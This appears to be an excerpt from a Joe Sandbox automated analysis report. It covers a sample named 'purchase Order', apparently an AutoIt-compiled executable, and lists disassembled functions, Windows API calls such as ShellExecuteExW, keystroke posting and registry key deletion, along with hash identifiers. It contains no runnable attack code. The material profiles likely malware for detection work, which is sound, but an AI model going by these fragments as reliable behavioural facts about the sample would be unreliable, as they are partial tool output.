_strlen.LIBCMT ref: 00C99800

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: ErrorLast_strlen$htonsinet_ntoaselect
String ID:
API String ID: 3480843537-0
Opcode ID: c0dbc1e3b59e0f6aeeb73039cfd39228dc8b89c0114de7440f823c54c871b6ac
Instruction ID: 3927e76e1fe46a8b73d442a79c1b7f7a71e31e5504a3043d17cb08310291c542
Opcode Fuzzy Hash: c0dbc1e3b59e0f6aeeb73039cfd39228dc8b89c0114de7440f823c54c871b6ac
Instruction Fuzzy Hash: 2581DF71504200ABC710EF68CC89F6BB7E8EF85714F144A1DF9569B2A1EB30DE04DB96

Function 00C6A979 Relevance: 12.1, APIs: 8, Instructions: 118COMMONLIBRARYCODE

Download Yara Rule

APIs

__mtinitlocknum.LIBCMT ref: 00C6A991

Part of subcall function 00C67D7C: __FF_MSGBANNER.LIBCMT ref: 00C67D91
Part of subcall function 00C67D7C: __NMSG_WRITE.LIBCMT ref: 00C67D98
Part of subcall function 00C67D7C: __malloc_crt.LIBCMT ref: 00C67DB8

__lock.LIBCMT ref: 00C6A9A4
__lock.LIBCMT ref: 00C6A9F0
InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,00CF6DE0,00000018,00C75E7B,?,00000000,00000109), ref: 00C6AA0C
EnterCriticalSection.KERNEL32(8000000C,00CF6DE0,00000018,00C75E7B,?,00000000,00000109), ref: 00C6AA29
LeaveCriticalSection.KERNEL32(8000000C), ref: 00C6AA39

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
String ID:
API String ID: 1422805418-0
Opcode ID: a573761f40defc34e2b4c66bbba76b0fb937e478cba313aef9c2052c00f9db9e
Instruction ID: 729e63b619e96a8bee45c5f74d2c4937cb6587c52b72f5dd6859c164a4bc1f14
Opcode Fuzzy Hash: a573761f40defc34e2b4c66bbba76b0fb937e478cba313aef9c2052c00f9db9e
Instruction Fuzzy Hash: 584127719003059BEB309FA8DAC475CBBB0AF05325F24832AE529FB2D2D7749941DF96

Function 00C916DA Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 309COMMON

Download Yara Rule

APIs

Part of subcall function 00C4936C: __swprintf.LIBCMT ref: 00C493AB
Part of subcall function 00C4936C: __itow.LIBCMT ref: 00C493DF

Part of subcall function 00C5C6F4: _wcscpy.LIBCMT ref: 00C5C717

_wcstok.LIBCMT ref: 00C9184E
_wcscpy.LIBCMT ref: 00C918DD
_memset.LIBCMT ref: 00C91910

Strings

X, xrefs: 00C91948

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: _wcscpy$__itow__swprintf_memset_wcstok
String ID: X
API String ID: 774024439-3081909835
Opcode ID: 5cd9c41321bd6690310f34e4ea1be2358fa4624708de9b5ff36d10e1daf4cfe9
Instruction ID: 4fce516b5174e9729abd0618364a54cc77f8bfa944de4595dfb49cdb034bfd2c
Opcode Fuzzy Hash: 5cd9c41321bd6690310f34e4ea1be2358fa4624708de9b5ff36d10e1daf4cfe9
Instruction Fuzzy Hash: 7BC181715043419FC764EF24C886AAEB7E4FF85350F04492DF99A972A2DB30ED45DB82

Function 00C5AE78 Relevance: 10.7, APIs: 7, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e3a3c3be6f15e0641589e463f6a73d1e922dd8fd9ff97a3fdcd09a9b2282ab7
Instruction ID: 1ce347c467babc08ee1fbd3db5aa9ee82a79a7b46ed9056fe359f68c659c0bb4
Opcode Fuzzy Hash: 7e3a3c3be6f15e0641589e463f6a73d1e922dd8fd9ff97a3fdcd09a9b2282ab7
Instruction Fuzzy Hash: 40716DB4900109EFCB04CF9ACC89AEEBB74FF85315F148259F926A6251D7309A85CF65

Function 00CA2230 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 191COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00CA225A
_memset.LIBCMT ref: 00CA2323
ShellExecuteExW.SHELL32(?), ref: 00CA2368

Part of subcall function 00C4936C: __swprintf.LIBCMT ref: 00C493AB
Part of subcall function 00C4936C: __itow.LIBCMT ref: 00C493DF

Part of subcall function 00C5C6F4: _wcscpy.LIBCMT ref: 00C5C717

CloseHandle.KERNEL32(00000000), ref: 00CA242F
FreeLibrary.KERNEL32(00000000), ref: 00CA243E

Strings

@, xrefs: 00CA2334

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
String ID: @
API String ID: 4082843840-2766056989
Opcode ID: 358b86407251fb5af00d113c447505e44cd9532399e435746b57136437f76562
Instruction ID: ddba3f8b055fab51cad4f1805172ee511e23f33c7a69b42dd69c3f5a8b4c49a8
Opcode Fuzzy Hash: 358b86407251fb5af00d113c447505e44cd9532399e435746b57136437f76562
Instruction Fuzzy Hash: 2571B27490062ADFCF15EF98C881A9EB7F5FF49314F108059E856AB361CB30AE41DB94

Function 00CAE062 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 187windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00CAE1D5
SendMessageW.USER32(?,000000B0,?,?), ref: 00CAE20D
IsDlgButtonChecked.USER32(?,00000001), ref: 00CAE248
GetWindowLongW.USER32(?,000000EC), ref: 00CAE269
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00CAE281

Strings

@U=u, xrefs: 00CAE1D5, 00CAE20D, 00CAE281

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: MessageSend$ButtonCheckedLongWindow
String ID: @U=u
API String ID: 3188977179-2594219639
Opcode ID: 7db5d5267bca775bdbb7b20ffdafa4a40762132832211fea3cdda62619eaa0c8
Instruction ID: 5592fb4db340538a98cdc25a866f03510159dcbbc01d704627c11123159a4f19
Opcode Fuzzy Hash: 7db5d5267bca775bdbb7b20ffdafa4a40762132832211fea3cdda62619eaa0c8
Instruction Fuzzy Hash: E261B634600215AFDB20DF54CC94FAE77B9EF4A308F144459F569973A2C771AE40DB90

Function 00C83DA8 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00C83DE7
GetKeyboardState.USER32(?), ref: 00C83DFC
SetKeyboardState.USER32(?), ref: 00C83E5D
PostMessageW.USER32(?,00000101,00000010,?), ref: 00C83E8B
PostMessageW.USER32(?,00000101,00000011,?), ref: 00C83EAA
PostMessageW.USER32(?,00000101,00000012,?), ref: 00C83EF0
PostMessageW.USER32(?,00000101,0000005B,?), ref: 00C83F13

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 4d7e6f6165752586d3005653ecbcbfe0bd076f7262436a406a9a60061195545b
Instruction ID: 479421d1b215fde83847a03d417240812234aae90d4ffd4a3c67cfed56c86bfe
Opcode Fuzzy Hash: 4d7e6f6165752586d3005653ecbcbfe0bd076f7262436a406a9a60061195545b
Instruction Fuzzy Hash: 1C51F5A0A047D53DFB366364CC49BBA7EA55B06B08F085489F1E5468C2D3E8EFC4D758

Function 00C83BC3 Relevance: 10.7, APIs: 7, Instructions: 164windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 00C83C02
GetKeyboardState.USER32(?), ref: 00C83C17
SetKeyboardState.USER32(?), ref: 00C83C78
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00C83CA4
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00C83CC1
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00C83D05
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00C83D26

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: e107a127402edda11d2415d41e7d8424e8f1811b21bed51928413390fca53ca7
Instruction ID: 561e64c4b95c461e486bbf1b7e6186e1cbe1ef5f8f3462672e56540346e0de40
Opcode Fuzzy Hash: e107a127402edda11d2415d41e7d8424e8f1811b21bed51928413390fca53ca7
Instruction Fuzzy Hash: FD5149A05047D53DFB36A334CC05B7ABF986B06B08F089589E0E55A4C2D294EF84E768

Function 00C87DB1 Relevance: 10.6, APIs: 7, Instructions: 137timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 00C87DBE
_wcsncpy.LIBCMT ref: 00C87DF3
_wcsncpy.LIBCMT ref: 00C87E25
_wcsncpy.LIBCMT ref: 00C87E58
_wcsncpy.LIBCMT ref: 00C87E9A
_wcsncpy.LIBCMT ref: 00C87ED4
_wcsncpy.LIBCMT ref: 00C87F03

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: _wcsncpy$LocalTime
String ID:
API String ID: 2945705084-0
Opcode ID: 989ce19fa8786e851504a653ba5a2077dfdab0637cd4244c88b4362d464d5cfd
Instruction ID: 31ea20969018ff6479abd9052722b6c46eaf398324707b1e6ffbd8a1db5b0919
Opcode Fuzzy Hash: 989ce19fa8786e851504a653ba5a2077dfdab0637cd4244c88b4362d464d5cfd
Instruction Fuzzy Hash: 34415076D14214B6DB20EBF4C8869CFB7ACDF05310F648966E518F3161FA34E615C3A9

Function 00CACCF7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 129COMMON

Download Yara Rule

Strings

@U=u, xrefs: 00CACDF0

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID:
String ID: @U=u
API String ID: 0-2594219639
Opcode ID: 72f5bf727e24f56b266b71050eac0fd73da4dbde2e317b1ab39c66a6f23677b3
Instruction ID: e575f222e7f3b18982991eeeeb2d7983641f5685347bcd35da4c08fca372e2ce
Opcode Fuzzy Hash: 72f5bf727e24f56b266b71050eac0fd73da4dbde2e317b1ab39c66a6f23677b3
Instruction Fuzzy Hash: E741A779D0020AAFD714DF68CCC8FA97B68EB0A314F150165F96AA72D1C770AE51D750

Function 00CA3D72 Relevance: 10.6, APIs: 7, Instructions: 100registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 00CA3DA1
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00CA3DCB
FreeLibrary.KERNEL32(00000000), ref: 00CA3E80

Part of subcall function 00CA3D72: RegCloseKey.ADVAPI32(?), ref: 00CA3DE8
Part of subcall function 00CA3D72: FreeLibrary.KERNEL32(?), ref: 00CA3E3A
Part of subcall function 00CA3D72: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00CA3E5D

RegDeleteKeyW.ADVAPI32(?,?), ref: 00CA3E25

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: EnumFreeLibrary$CloseDeleteOpen
String ID:
API String ID: 395352322-0
Opcode ID: 10a164f975e0b73ec744d60bdf2ac69d97f42716632c9e247415ae5cfd39f01a
Instruction ID: 51e5823e6ff28b2d609e5c49588668eb2d1c9d9ad44fc1623dec51ca41e30f6e
Opcode Fuzzy Hash: 10a164f975e0b73ec744d60bdf2ac69d97f42716632c9e247415ae5cfd39f01a
Instruction Fuzzy Hash: AF31E8B191114ABFDB159B94DC99EFFB7BCEB09304F00016AF512E2150E6749F899BA0

Function 00C808AF Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C808F2
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C80918
SysAllocString.OLEAUT32(00000000), ref: 00C8091B
SysAllocString.OLEAUT32(?), ref: 00C80939
SysFreeString.OLEAUT32(?), ref: 00C80942
StringFromGUID2.OLE32(?,?,00000028), ref: 00C80967
SysAllocString.OLEAUT32(?), ref: 00C80975

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: f8fb187091dbe787f636bd670b7aa6a59749025c39c9b6388184edf26db69c94
Instruction ID: d1d930280d5e277f897805703ce7e4aafe8279db34b97fa5a399dda4b4763978
Opcode Fuzzy Hash: f8fb187091dbe787f636bd670b7aa6a59749025c39c9b6388184edf26db69c94
Instruction Fuzzy Hash: 9121B576600208AFAB50EFA8DC88EAF73ACEB09365B108125F915DB151D670ED49CB64

Function 00C7B80A Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 93windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00C7B88E
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00C7B8A1
SendMessageW.USER32(?,00000189,?,00000000), ref: 00C7B8D1

Strings

@U=u, xrefs: 00C7B88E, 00C7B8A1, 00C7B8D1
ComboBox, xrefs: 00C7B815
ListBox, xrefs: 00C7B84D

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: MessageSend
String ID: @U=u$ComboBox$ListBox
API String ID: 3850602802-2258501812
Opcode ID: eb87d921c9c13ed17516ef28b32955a67b4954624dab27a1b87face4c399b63d
Instruction ID: bb37a22b692d1ae4e74c472d8f2bd3548285a4fe64eccf78aba3afc73df23653
Opcode Fuzzy Hash: eb87d921c9c13ed17516ef28b32955a67b4954624dab27a1b87face4c399b63d
Instruction Fuzzy Hash: E0210276900208BFDB44ABA4C886EFE777CEF05350F108129F56AA71E1DB744E0AA761

Function 00C82472 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00C82485
__wcsnicmp.LIBCMT ref: 00C824A6
__wcsnicmp.LIBCMT ref: 00C824C0

Strings

#OnAutoItStartRegister, xrefs: 00C824BA
#notrayicon, xrefs: 00C8247D
#requireadmin, xrefs: 00C824A0

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 1038674560-2734436370
Opcode ID: 823b0270734f4973703de20acbb58e2b02a2122a1e2dad18f512f5485dae1654
Instruction ID: d3f5396384b6fef6fcaa5be9a49ad03ef5b45568569b4f7fa8a17f2742cbfbac
Opcode Fuzzy Hash: 823b0270734f4973703de20acbb58e2b02a2122a1e2dad18f512f5485dae1654
Instruction Fuzzy Hash: 26219E7114021177C331BA34CC0AF777398EFA4308F64403AF84697182E7619A82E3AD

Function 00C80986 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C809CB
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C809F1
SysAllocString.OLEAUT32(00000000), ref: 00C809F4
SysAllocString.OLEAUT32 ref: 00C80A15
SysFreeString.OLEAUT32 ref: 00C80A1E
StringFromGUID2.OLE32(?,?,00000028), ref: 00C80A38
SysAllocString.OLEAUT32(?), ref: 00C80A46

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 6afa7c2322a63f32cf24d62440455d8d231c44653c1e6a9d31c77111cb3d4d8e
Instruction ID: 3864dbf1377b667a80acc5c523a4b3c992a1baa2a200044a3dfd163ead3f15d9
Opcode Fuzzy Hash: 6afa7c2322a63f32cf24d62440455d8d231c44653c1e6a9d31c77111cb3d4d8e
Instruction Fuzzy Hash: BB21B835200204AFDB14EFA8CC89EBB73ECEF09364B108135F919CB161D670ED859754

Function 00C7DBBF Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 87windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00C7DBD7
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00C7DBF4
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00C7DC2C
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00C7DC52
_wcsstr.LIBCMT ref: 00C7DC5C

Strings

@U=u, xrefs: 00C7DBF4, 00C7DC2C

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
String ID: @U=u
API String ID: 3902887630-2594219639
Opcode ID: 0834b24ddeb528c2217d27bbdbcf267361a03e4384b35870d5ea8d62dc96bd1a
Instruction ID: 14fcef2c689d9dec525ab5479e410fd71160c37e7b650eeca8bc95bf1cfd05c4
Opcode Fuzzy Hash: 0834b24ddeb528c2217d27bbdbcf267361a03e4384b35870d5ea8d62dc96bd1a
Instruction Fuzzy Hash: 3221F571204100BBEB265B79DC49E7F7BA8DF45760F108039F80FDA191EAA1C941E2A0

Function 00C7BC77 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 82windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00C7BC90
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00C7BCC2
__itow.LIBCMT ref: 00C7BCDA
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00C7BD00
__itow.LIBCMT ref: 00C7BD11

Strings

@U=u, xrefs: 00C7BC90, 00C7BCC2, 00C7BD00

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: MessageSend$__itow
String ID: @U=u
API String ID: 3379773720-2594219639
Opcode ID: 6c54bb06f821be30e639c2f3e24e2e454296c786a4d77a0bca6e277db3311f13
Instruction ID: 5484a917e722e2d9f68422eb7188fa9b644855340000f042ab5df69b6f901bf6
